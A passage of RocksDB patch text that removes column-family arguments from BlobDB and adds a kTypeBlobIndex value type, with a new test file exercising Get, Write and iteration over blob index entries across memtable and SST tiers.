if (s.ok()) { - s = CommonGet(cfd, key, index_entry, value->GetSelf()); + s = CommonGet(key, index_entry, value->GetSelf()); value->PinSelf(); } if (snapshot_created) { @@ -1324,15 +1334,11 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, } Slice BlobDBIterator::value() const { - Slice index_entry = iter_->value(); - - auto cfh = reinterpret_cast(cfh_); - auto cfd = cfh->cfd(); - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); - Status s = db_impl_->CommonGet(cfd, iter_->key(), index_entry.ToString(false), - &vpart_); + Slice index_entry = iter_->value(); + Status s = + db_impl_->CommonGet(iter_->key(), index_entry.ToString(false), &vpart_); return Slice(vpart_); } @@ -2248,14 +2254,13 @@ std::pair BlobDBImpl::RunGC(bool aborted) { return std::make_pair(true, -1); } -Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options, - ColumnFamilyHandle* column_family) { +Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) { // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. ReadOptions ro(read_options); bool snapshot_created = SetSnapshotIfNeeded(&ro); - return new BlobDBIterator(db_->NewIterator(ro, column_family), column_family, - this, snapshot_created, ro.snapshot); + return new BlobDBIterator(db_->NewIterator(ro), this, snapshot_created, + ro.snapshot); } Status DestroyBlobDB(const std::string& dbname, const Options& options, @@ -2299,8 +2304,7 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, if (!s.ok()) { return s; } - auto cfh = reinterpret_cast(DefaultColumnFamily()); - return CommonGet(cfh->cfd(), key, index_entry, nullptr, sequence); + return CommonGet(key, index_entry, nullptr, sequence); } std::vector> BlobDBImpl::TEST_GetBlobFiles() const { diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index e7c49b20d4d..d8dec6d4c27 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -205,44 +205,34 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; - using rocksdb::StackableDB::Put; - Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, - const Slice& key, const Slice& value) override; + using BlobDB::Put; + Status Put(const WriteOptions& options, const Slice& key, + const Slice& value) override; - using rocksdb::StackableDB::Delete; - Status Delete(const WriteOptions& options, ColumnFamilyHandle* column_family, - const Slice& key) override; + using BlobDB::Delete; + Status Delete(const WriteOptions& options, const Slice& key) override; - using rocksdb::StackableDB::SingleDelete; - virtual Status SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) override; - - using rocksdb::StackableDB::Get; + using BlobDB::Get; Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; - using rocksdb::StackableDB::NewIterator; - virtual Iterator* NewIterator(const ReadOptions& read_options, - ColumnFamilyHandle* column_family) override; + using BlobDB::NewIterator; + virtual Iterator* NewIterator(const ReadOptions& read_options) override; - using rocksdb::StackableDB::MultiGet; + using BlobDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& read_options, - const std::vector& column_family, const std::vector& keys, std::vector* values) override; virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override; using BlobDB::PutWithTTL; - Status PutWithTTL(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, + Status PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) override; using BlobDB::PutUntil; - Status PutUntil(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, + Status PutUntil(const WriteOptions& options, const Slice& key, const Slice& value_unc, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -282,9 +272,8 @@ class BlobDBImpl : public BlobDB { // Return true if a snapshot is created. bool SetSnapshotIfNeeded(ReadOptions* read_options); - Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, - const std::string& index_entry, std::string* value, - SequenceNumber* sequence = nullptr); + Status CommonGet(const Slice& key, const std::string& index_entry, + std::string* value, SequenceNumber* sequence = nullptr); Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -705,11 +694,9 @@ class BlobFile { class BlobDBIterator : public Iterator { public: - explicit BlobDBIterator(Iterator* iter, ColumnFamilyHandle* column_family, - BlobDBImpl* impl, bool own_snapshot, + explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot, const Snapshot* snapshot) : iter_(iter), - cfh_(column_family), db_impl_(impl), own_snapshot_(own_snapshot), snapshot_(snapshot) { @@ -748,7 +735,6 @@ class BlobDBIterator : public Iterator { private: Iterator* iter_; - ColumnFamilyHandle* cfh_; BlobDBImpl* db_impl_; bool own_snapshot_; const Snapshot* snapshot_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 63b08bf459b..6e8c9af4bb0 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -803,6 +803,39 @@ TEST_F(BlobDBTest, ReadWhileGC) { } } +TEST_F(BlobDBTest, ColumnFamilyNotSupported) { + Options options; + options.env = mock_env_.get(); + mock_env_->set_now_micros(0); + Open(BlobDBOptions(), options); + ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily(); + ColumnFamilyHandle *handle = nullptr; + std::string value; + std::vector values; + // The call simply pass through to base db. It should succeed. + ASSERT_OK( + blob_db_->CreateColumnFamily(ColumnFamilyOptions(), "foo", &handle)); + ASSERT_TRUE(blob_db_->Put(WriteOptions(), handle, "k", "v").IsNotSupported()); + ASSERT_TRUE(blob_db_->PutWithTTL(WriteOptions(), handle, "k", "v", 60) + .IsNotSupported()); + ASSERT_TRUE(blob_db_->PutUntil(WriteOptions(), handle, "k", "v", 100) + .IsNotSupported()); + WriteBatch batch; + batch.Put("k1", "v1"); + batch.Put(handle, "k2", "v2"); + ASSERT_TRUE(blob_db_->Write(WriteOptions(), &batch).IsNotSupported()); + ASSERT_TRUE(blob_db_->Get(ReadOptions(), "k1", &value).IsNotFound()); + ASSERT_TRUE( + blob_db_->Get(ReadOptions(), handle, "k", &value).IsNotSupported()); + auto statuses = blob_db_->MultiGet(ReadOptions(), {default_handle, handle}, + {"k1", "k2"}, &values); + ASSERT_EQ(2, statuses.size()); + ASSERT_TRUE(statuses[0].IsNotSupported()); + ASSERT_TRUE(statuses[1].IsNotSupported()); + ASSERT_EQ(nullptr, blob_db_->NewIterator(ReadOptions(), handle)); + delete handle; +} + } // namespace blob_db } // namespace rocksdb From c293472908d3b0452848483e86f99d0086eb86ea Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 3 Oct 2017 09:08:07 -0700 Subject: [PATCH 170/205] Add ValueType::kTypeBlobIndex Summary: Add kTypeBlobIndex value type, which will be used by blob db only, to insert a (key, blob_offset) KV pair. The purpose is to 1. Make it possible to open existing rocksdb instance as blob db. Existing value will be of kTypeIndex type, while value inserted by blob db will be of kTypeBlobIndex. 2. Make rocksdb able to detect if the db contains value written by blob db, if so return error. 3. Make it possible to have blob db optionally store value in SST file (with kTypeValue type) or as a blob value (with kTypeBlobIndex type). The root db (DBImpl) basically pretended kTypeBlobIndex are normal value on write. On Get if is_blob is provided, return whether the value read is of kTypeBlobIndex type, or return Status::NotSupported() status if is_blob is not provided. On scan allow_blob flag is pass and if the flag is true, return wether the value is of kTypeBlobIndex type via iter->IsBlob(). Changes on blob db side will be in a separate patch. Closes https://github.com/facebook/rocksdb/pull/2886 Differential Revision: D5838431 Pulled By: yiwu-arbug fbshipit-source-id: 3c5306c62bc13bb11abc03422ec5cbcea1203cca --- CMakeLists.txt | 1 + Makefile | 4 + TARGETS | 1 + db/compaction_iterator.cc | 2 + db/db_blob_index_test.cc | 407 ++++++++++++++++++++++++++++++ db/db_impl.cc | 158 ++++++------ db/db_impl.h | 13 +- db/db_impl_debug.cc | 9 + db/db_iter.cc | 99 ++++++-- db/db_iter.h | 15 +- db/dbformat.cc | 2 +- db/dbformat.h | 4 +- db/memtable.cc | 24 +- db/memtable.h | 8 +- db/memtable_list.cc | 18 +- db/memtable_list.h | 10 +- db/version_set.cc | 10 +- db/version_set.h | 3 +- db/write_batch.cc | 64 ++++- db/write_batch_internal.h | 3 + include/rocksdb/listener.h | 1 + include/rocksdb/write_batch.h | 6 + table/get_context.cc | 28 +- table/get_context.h | 7 +- utilities/blob_db/blob_db_test.cc | 2 +- 25 files changed, 753 insertions(+), 146 deletions(-) create mode 100644 db/db_blob_index_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 31ab5abb8f5..ab2177b886e 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -713,6 +713,7 @@ if(WITH_TESTS) db/corruption_test.cc db/cuckoo_table_db_test.cc db/db_basic_test.cc + db/db_blob_index_test.cc db/db_block_cache_test.cc db/db_bloom_filter_test.cc db/db_compaction_filter_test.cc diff --git a/Makefile b/Makefile index a657fad72b5..5a89f6bf79d 100644 --- a/Makefile +++ b/Makefile @@ -360,6 +360,7 @@ TESTS = \ db_wal_test \ db_block_cache_test \ db_test \ + db_blob_index_test \ db_bloom_filter_test \ db_iter_test \ db_log_iter_test \ @@ -1063,6 +1064,9 @@ db_test: db/db_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) db_test2: db/db_test2.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) +db_blob_index_test: db/db_blob_index_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) + $(AM_LINK) + db_block_cache_test: db/db_block_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) diff --git a/TARGETS b/TARGETS index 3fac4a73785..ac85eab93c7 100644 --- a/TARGETS +++ b/TARGETS @@ -367,6 +367,7 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['cuckoo_table_reader_test', 'table/cuckoo_table_reader_test.cc', 'serial'], ['date_tiered_test', 'utilities/date_tiered/date_tiered_test.cc', 'serial'], ['db_basic_test', 'db/db_basic_test.cc', 'serial'], + ['db_blob_index_test', 'db/db_blob_index_test.cc', 'serial'], ['db_block_cache_test', 'db/db_block_cache_test.cc', 'serial'], ['db_bloom_filter_test', 'db/db_bloom_filter_test.cc', 'serial'], ['db_compaction_filter_test', 'db/db_compaction_filter_test.cc', 'parallel'], diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 54726029227..8eac637c426 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -25,6 +25,8 @@ CompactionEventListener::CompactionListenerValueType fromInternalValueType( kSingleDelete; case kTypeRangeDeletion: return CompactionEventListener::CompactionListenerValueType::kRangeDelete; + case kTypeBlobIndex: + return CompactionEventListener::CompactionListenerValueType::kBlobIndex; default: assert(false); return CompactionEventListener::CompactionListenerValueType::kInvalid; diff --git a/db/db_blob_index_test.cc b/db/db_blob_index_test.cc new file mode 100644 index 00000000000..bfc95760c02 --- /dev/null +++ b/db/db_blob_index_test.cc @@ -0,0 +1,407 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +// +// Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Use of this source code is governed by a BSD-style license that can be +// found in the LICENSE file. See the AUTHORS file for names of contributors. + +#include +#include +#include +#include + +#include "db/column_family.h" +#include "db/db_iter.h" +#include "db/db_test_util.h" +#include "db/dbformat.h" +#include "db/write_batch_internal.h" +#include "port/port.h" +#include "port/stack_trace.h" +#include "util/string_util.h" +#include "utilities/merge_operators.h" + +namespace rocksdb { + +// kTypeBlobIndex is a value type used by BlobDB only. The base rocksdb +// should accept the value type on write, and report not supported value +// for reads, unless caller request for it explicitly. The base rocksdb +// doesn't understand format of actual blob index (the value). +class DBBlobIndexTest : public DBTestBase { + public: + enum Tier { + kMemtable = 0, + kImmutableMemtables = 1, + kL0SstFile = 2, + kLnSstFile = 3, + }; + const std::vector kAllTiers = {Tier::kMemtable, + Tier::kImmutableMemtables, + Tier::kL0SstFile, Tier::kLnSstFile}; + + DBBlobIndexTest() : DBTestBase("/db_blob_index_test") {} + + ColumnFamilyHandle* cfh() { return dbfull()->DefaultColumnFamily(); } + + ColumnFamilyData* cfd() { + return reinterpret_cast(cfh())->cfd(); + } + + Status PutBlobIndex(WriteBatch* batch, const Slice& key, + const Slice& blob_index) { + return WriteBatchInternal::PutBlobIndex(batch, cfd()->GetID(), key, + blob_index); + } + + Status Write(WriteBatch* batch) { + return dbfull()->Write(WriteOptions(), batch); + } + + std::string GetImpl(const Slice& key, bool* is_blob_index = nullptr, + const Snapshot* snapshot = nullptr) { + ReadOptions read_options; + read_options.snapshot = snapshot; + PinnableSlice value; + auto s = dbfull()->GetImpl(read_options, cfh(), key, &value, + nullptr /*value_found*/, is_blob_index); + if (s.IsNotFound()) { + return "NOT_FOUND"; + } + if (s.IsNotSupported()) { + return "NOT_SUPPORTED"; + } + if (!s.ok()) { + return s.ToString(); + } + return value.ToString(); + } + + std::string GetBlobIndex(const Slice& key, + const Snapshot* snapshot = nullptr) { + bool is_blob_index = false; + std::string value = GetImpl(key, &is_blob_index, snapshot); + if (!is_blob_index) { + return "NOT_BLOB"; + } + return value; + } + + ArenaWrappedDBIter* GetBlobIterator() { + return dbfull()->NewIteratorImpl(ReadOptions(), cfd(), + dbfull()->GetLatestSequenceNumber(), + true /*allow_blob*/); + } + + Options GetTestOptions() { + Options options; + options.create_if_missing = true; + options.num_levels = 2; + options.disable_auto_compactions = true; + // Disable auto flushes. + options.max_write_buffer_number = 10; + options.min_write_buffer_number_to_merge = 10; + options.merge_operator = MergeOperators::CreateStringAppendOperator(); + return options; + } + + void MoveDataTo(Tier tier) { + switch (tier) { + case Tier::kMemtable: + break; + case Tier::kImmutableMemtables: + ASSERT_OK(dbfull()->TEST_SwitchMemtable()); + break; + case Tier::kL0SstFile: + ASSERT_OK(Flush()); + break; + case Tier::kLnSstFile: + ASSERT_OK(Flush()); + ASSERT_OK(Put("a", "dummy")); + ASSERT_OK(Put("z", "dummy")); + ASSERT_OK(Flush()); + ASSERT_OK( + dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); + ASSERT_EQ("0,1", FilesPerLevel()); + break; + } + } +}; + +// Should be able to write kTypeBlobIndex to memtables and SST files. +TEST_F(DBBlobIndexTest, Write) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + for (int i = 1; i <= 5; i++) { + std::string index = ToString(i); + WriteBatch batch; + ASSERT_OK(PutBlobIndex(&batch, "key" + index, "blob" + index)); + ASSERT_OK(Write(&batch)); + } + MoveDataTo(tier); + for (int i = 1; i <= 5; i++) { + std::string index = ToString(i); + ASSERT_EQ("blob" + index, GetBlobIndex("key" + index)); + } + } +} + +// Get should be able to return blob index if is_blob_index is provided, +// otherwise return Status::NotSupported status. +TEST_F(DBBlobIndexTest, Get) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + WriteBatch batch; + ASSERT_OK(batch.Put("key", "value")); + ASSERT_OK(PutBlobIndex(&batch, "blob_key", "blob_index")); + ASSERT_OK(Write(&batch)); + MoveDataTo(tier); + // Verify normal value + bool is_blob_index = false; + PinnableSlice value; + ASSERT_EQ("value", Get("key")); + ASSERT_EQ("value", GetImpl("key")); + ASSERT_EQ("value", GetImpl("key", &is_blob_index)); + ASSERT_FALSE(is_blob_index); + // Verify blob index + ASSERT_TRUE(Get("blob_key", &value).IsNotSupported()); + ASSERT_EQ("NOT_SUPPORTED", GetImpl("blob_key")); + ASSERT_EQ("blob_index", GetImpl("blob_key", &is_blob_index)); + ASSERT_TRUE(is_blob_index); + } +} + +// Get should NOT return Status::NotSupported if blob index is updated with +// a normal value. +TEST_F(DBBlobIndexTest, Updated) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + WriteBatch batch; + for (int i = 0; i < 10; i++) { + ASSERT_OK(PutBlobIndex(&batch, "key" + ToString(i), "blob_index")); + } + ASSERT_OK(Write(&batch)); + // Avoid blob values from being purged. + const Snapshot* snapshot = dbfull()->GetSnapshot(); + ASSERT_OK(Put("key1", "new_value")); + ASSERT_OK(Merge("key2", "a")); + ASSERT_OK(Merge("key2", "b")); + ASSERT_OK(Merge("key2", "c")); + ASSERT_OK(Delete("key3")); + ASSERT_OK(SingleDelete("key4")); + ASSERT_OK(Delete("key5")); + ASSERT_OK(Merge("key5", "a")); + ASSERT_OK(Merge("key5", "b")); + ASSERT_OK(Merge("key5", "c")); + ASSERT_OK(dbfull()->DeleteRange(WriteOptions(), cfh(), "key6", "key9")); + MoveDataTo(tier); + for (int i = 0; i < 10; i++) { + ASSERT_EQ("blob_index", GetBlobIndex("key" + ToString(i), snapshot)); + } + ASSERT_EQ("new_value", Get("key1")); + ASSERT_EQ("NOT_SUPPORTED", GetImpl("key2")); + ASSERT_EQ("NOT_FOUND", Get("key3")); + ASSERT_EQ("NOT_FOUND", Get("key4")); + ASSERT_EQ("a,b,c", GetImpl("key5")); + for (int i = 6; i < 9; i++) { + ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i))); + } + ASSERT_EQ("blob_index", GetBlobIndex("key9")); + dbfull()->ReleaseSnapshot(snapshot); + } +} + +// Iterator should get blob value if allow_blob flag is set, +// otherwise return Status::NotSupported status. +TEST_F(DBBlobIndexTest, Iterate) { + const std::vector> data = { + /*00*/ {kTypeValue}, + /*01*/ {kTypeBlobIndex}, + /*02*/ {kTypeValue}, + /*03*/ {kTypeBlobIndex, kTypeValue}, + /*04*/ {kTypeValue}, + /*05*/ {kTypeValue, kTypeBlobIndex}, + /*06*/ {kTypeValue}, + /*07*/ {kTypeDeletion, kTypeBlobIndex}, + /*08*/ {kTypeValue}, + /*09*/ {kTypeSingleDeletion, kTypeBlobIndex}, + /*10*/ {kTypeValue}, + /*11*/ {kTypeMerge, kTypeMerge, kTypeMerge, kTypeBlobIndex}, + /*12*/ {kTypeValue}, + /*13*/ + {kTypeMerge, kTypeMerge, kTypeMerge, kTypeDeletion, kTypeBlobIndex}, + /*14*/ {kTypeValue}, + /*15*/ {kTypeBlobIndex}, + /*16*/ {kTypeValue}, + }; + + auto get_key = [](int index) { + char buf[20]; + snprintf(buf, sizeof(buf), "%02d", index); + return "key" + std::string(buf); + }; + + auto get_value = [&](int index, int version) { + return get_key(index) + "_value" + ToString(version); + }; + + auto check_iterator = [&](Iterator* iterator, Status::Code expected_status, + const Slice& expected_value) { + ASSERT_EQ(expected_status, iterator->status().code()); + if (expected_status == Status::kOk) { + ASSERT_TRUE(iterator->Valid()); + ASSERT_EQ(expected_value, iterator->value()); + } else { + ASSERT_FALSE(iterator->Valid()); + } + }; + + auto create_normal_iterator = [&]() -> Iterator* { + return dbfull()->NewIterator(ReadOptions()); + }; + + auto create_blob_iterator = [&]() -> Iterator* { return GetBlobIterator(); }; + + auto check_is_blob = [&](bool is_blob) { + return [is_blob](Iterator* iterator) { + ASSERT_EQ(is_blob, + reinterpret_cast(iterator)->IsBlob()); + }; + }; + + auto verify = [&](int index, Status::Code expected_status, + const Slice& forward_value, const Slice& backward_value, + std::function create_iterator, + std::function extra_check = nullptr) { + // Seek + auto* iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->Seek(get_key(index)); + check_iterator(iterator, expected_status, forward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // Next + iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->Seek(get_key(index - 1)); + ASSERT_TRUE(iterator->Valid()); + iterator->Next(); + check_iterator(iterator, expected_status, forward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // SeekForPrev + iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->SeekForPrev(get_key(index)); + check_iterator(iterator, expected_status, backward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // Prev + iterator = create_iterator(); + iterator->Seek(get_key(index + 1)); + ASSERT_TRUE(iterator->Valid()); + iterator->Prev(); + check_iterator(iterator, expected_status, backward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + }; + + for (auto tier : {Tier::kMemtable} /*kAllTiers*/) { + // Avoid values from being purged. + std::vector snapshots; + DestroyAndReopen(GetTestOptions()); + + // fill data + for (int i = 0; i < static_cast(data.size()); i++) { + for (int j = static_cast(data[i].size()) - 1; j >= 0; j--) { + std::string key = get_key(i); + std::string value = get_value(i, j); + WriteBatch batch; + switch (data[i][j]) { + case kTypeValue: + ASSERT_OK(Put(key, value)); + break; + case kTypeDeletion: + ASSERT_OK(Delete(key)); + break; + case kTypeSingleDeletion: + ASSERT_OK(SingleDelete(key)); + break; + case kTypeMerge: + ASSERT_OK(Merge(key, value)); + break; + case kTypeBlobIndex: + ASSERT_OK(PutBlobIndex(&batch, key, value)); + ASSERT_OK(Write(&batch)); + break; + default: + assert(false); + }; + } + snapshots.push_back(dbfull()->GetSnapshot()); + } + ASSERT_OK( + dbfull()->DeleteRange(WriteOptions(), cfh(), get_key(15), get_key(16))); + snapshots.push_back(dbfull()->GetSnapshot()); + MoveDataTo(tier); + + // Normal iterator + verify(1, Status::kNotSupported, "", "", create_normal_iterator); + verify(3, Status::kNotSupported, "", "", create_normal_iterator); + verify(5, Status::kOk, get_value(5, 0), get_value(5, 0), + create_normal_iterator); + verify(7, Status::kOk, get_value(8, 0), get_value(6, 0), + create_normal_iterator); + verify(9, Status::kOk, get_value(10, 0), get_value(8, 0), + create_normal_iterator); + verify(11, Status::kNotSupported, "", "", create_normal_iterator); + verify(13, Status::kOk, + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + create_normal_iterator); + verify(15, Status::kOk, get_value(16, 0), get_value(14, 0), + create_normal_iterator); + + // Iterator with blob support + verify(1, Status::kOk, get_value(1, 0), get_value(1, 0), + create_blob_iterator, check_is_blob(true)); + verify(3, Status::kOk, get_value(3, 0), get_value(3, 0), + create_blob_iterator, check_is_blob(true)); + verify(5, Status::kOk, get_value(5, 0), get_value(5, 0), + create_blob_iterator, check_is_blob(false)); + verify(7, Status::kOk, get_value(8, 0), get_value(6, 0), + create_blob_iterator, check_is_blob(false)); + verify(9, Status::kOk, get_value(10, 0), get_value(8, 0), + create_blob_iterator, check_is_blob(false)); + verify(11, Status::kNotSupported, "", "", create_blob_iterator); + verify(13, Status::kOk, + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + create_blob_iterator, check_is_blob(false)); + verify(15, Status::kOk, get_value(16, 0), get_value(14, 0), + create_blob_iterator, check_is_blob(false)); + + for (auto* snapshot : snapshots) { + dbfull()->ReleaseSnapshot(snapshot); + } + } +} + +} // namespace rocksdb + +int main(int argc, char** argv) { + rocksdb::port::InstallStackTraceHandler(); + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} diff --git a/db/db_impl.cc b/db/db_impl.cc index 4aba14c6077..688bc51fad8 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -909,7 +909,8 @@ Status DBImpl::Get(const ReadOptions& read_options, Status DBImpl::GetImpl(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, - PinnableSlice* pinnable_val, bool* value_found) { + PinnableSlice* pinnable_val, bool* value_found, + bool* is_blob_index) { assert(pinnable_val != nullptr); StopWatch sw(env_, stats_, DB_GET); PERF_TIMER_GUARD(get_snapshot_time); @@ -959,13 +960,13 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, bool done = false; if (!skip_memtable) { if (sv->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context, - &range_del_agg, read_options)) { + &range_del_agg, read_options, is_blob_index)) { done = true; pinnable_val->PinSelf(); RecordTick(stats_, MEMTABLE_HIT); } else if ((s.ok() || s.IsMergeInProgress()) && sv->imm->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context, - &range_del_agg, read_options)) { + &range_del_agg, read_options, is_blob_index)) { done = true; pinnable_val->PinSelf(); RecordTick(stats_, MEMTABLE_HIT); @@ -977,7 +978,8 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, if (!done) { PERF_TIMER_GUARD(get_from_output_files_time); sv->current->Get(read_options, lkey, pinnable_val, &s, &merge_context, - &range_del_agg, value_found); + &range_del_agg, value_found, nullptr, nullptr, + is_blob_index); RecordTick(stats_, MEMTABLE_MISS); } @@ -1417,73 +1419,79 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); - SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); - auto snapshot = read_options.snapshot != nullptr - ? reinterpret_cast( - read_options.snapshot)->number_ + ? reinterpret_cast(read_options.snapshot) + ->number_ : latest_snapshot; - - // Try to generate a DB iterator tree in continuous memory area to be - // cache friendly. Here is an example of result: - // +-------------------------------+ - // | | - // | ArenaWrappedDBIter | - // | + | - // | +---> Inner Iterator ------------+ - // | | | | - // | | +-- -- -- -- -- -- -- --+ | - // | +--- | Arena | | - // | | | | - // | Allocated Memory: | | - // | | +-------------------+ | - // | | | DBIter | <---+ - // | | + | - // | | | +-> iter_ ------------+ - // | | | | | - // | | +-------------------+ | - // | | | MergingIterator | <---+ - // | | + | - // | | | +->child iter1 ------------+ - // | | | | | | - // | | +->child iter2 ----------+ | - // | | | | | | | - // | | | +->child iter3 --------+ | | - // | | | | | | - // | | +-------------------+ | | | - // | | | Iterator1 | <--------+ - // | | +-------------------+ | | - // | | | Iterator2 | <------+ - // | | +-------------------+ | - // | | | Iterator3 | <----+ - // | | +-------------------+ - // | | | - // +-------+-----------------------+ - // - // ArenaWrappedDBIter inlines an arena area where all the iterators in - // the iterator tree are allocated in the order of being accessed when - // querying. - // Laying out the iterators in the order of being accessed makes it more - // likely that any iterator pointer is close to the iterator it points to so - // that they are likely to be in the same cache line and/or page. - ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), snapshot, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number, - ((read_options.snapshot != nullptr) ? nullptr : this), cfd); - - InternalIterator* internal_iter = - NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), - db_iter->GetRangeDelAggregator()); - db_iter->SetIterUnderDBIter(internal_iter); - - return db_iter; + return NewIteratorImpl(read_options, cfd, snapshot); } // To stop compiler from complaining return nullptr; } +ArenaWrappedDBIter* DBImpl::NewIteratorImpl(const ReadOptions& read_options, + ColumnFamilyData* cfd, + SequenceNumber snapshot, + bool allow_blob) { + SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); + + // Try to generate a DB iterator tree in continuous memory area to be + // cache friendly. Here is an example of result: + // +-------------------------------+ + // | | + // | ArenaWrappedDBIter | + // | + | + // | +---> Inner Iterator ------------+ + // | | | | + // | | +-- -- -- -- -- -- -- --+ | + // | +--- | Arena | | + // | | | | + // | Allocated Memory: | | + // | | +-------------------+ | + // | | | DBIter | <---+ + // | | + | + // | | | +-> iter_ ------------+ + // | | | | | + // | | +-------------------+ | + // | | | MergingIterator | <---+ + // | | + | + // | | | +->child iter1 ------------+ + // | | | | | | + // | | +->child iter2 ----------+ | + // | | | | | | | + // | | | +->child iter3 --------+ | | + // | | | | | | + // | | +-------------------+ | | | + // | | | Iterator1 | <--------+ + // | | +-------------------+ | | + // | | | Iterator2 | <------+ + // | | +-------------------+ | + // | | | Iterator3 | <----+ + // | | +-------------------+ + // | | | + // +-------+-----------------------+ + // + // ArenaWrappedDBIter inlines an arena area where all the iterators in + // the iterator tree are allocated in the order of being accessed when + // querying. + // Laying out the iterators in the order of being accessed makes it more + // likely that any iterator pointer is close to the iterator it points to so + // that they are likely to be in the same cache line and/or page. + ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( + env_, read_options, *cfd->ioptions(), snapshot, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + sv->version_number, ((read_options.snapshot != nullptr) ? nullptr : this), + cfd, allow_blob); + + InternalIterator* internal_iter = + NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), + db_iter->GetRangeDelAggregator()); + db_iter->SetIterUnderDBIter(internal_iter); + + return db_iter; +} + Status DBImpl::NewIterators( const ReadOptions& read_options, const std::vector& column_families, @@ -1527,28 +1535,16 @@ Status DBImpl::NewIterators( #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); + auto snapshot = + read_options.snapshot != nullptr + ? reinterpret_cast(read_options.snapshot) + ->number_ + : latest_snapshot; for (size_t i = 0; i < column_families.size(); ++i) { auto* cfd = reinterpret_cast( column_families[i])->cfd(); - SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); - - auto snapshot = - read_options.snapshot != nullptr - ? reinterpret_cast( - read_options.snapshot)->number_ - : latest_snapshot; - - ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), snapshot, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number, - ((read_options.snapshot != nullptr) ? nullptr : this), cfd); - InternalIterator* internal_iter = - NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), - db_iter->GetRangeDelAggregator()); - db_iter->SetIterUnderDBIter(internal_iter); - iterators->push_back(db_iter); + iterators->push_back(NewIteratorImpl(read_options, cfd, snapshot)); } } diff --git a/db/db_impl.h b/db/db_impl.h index 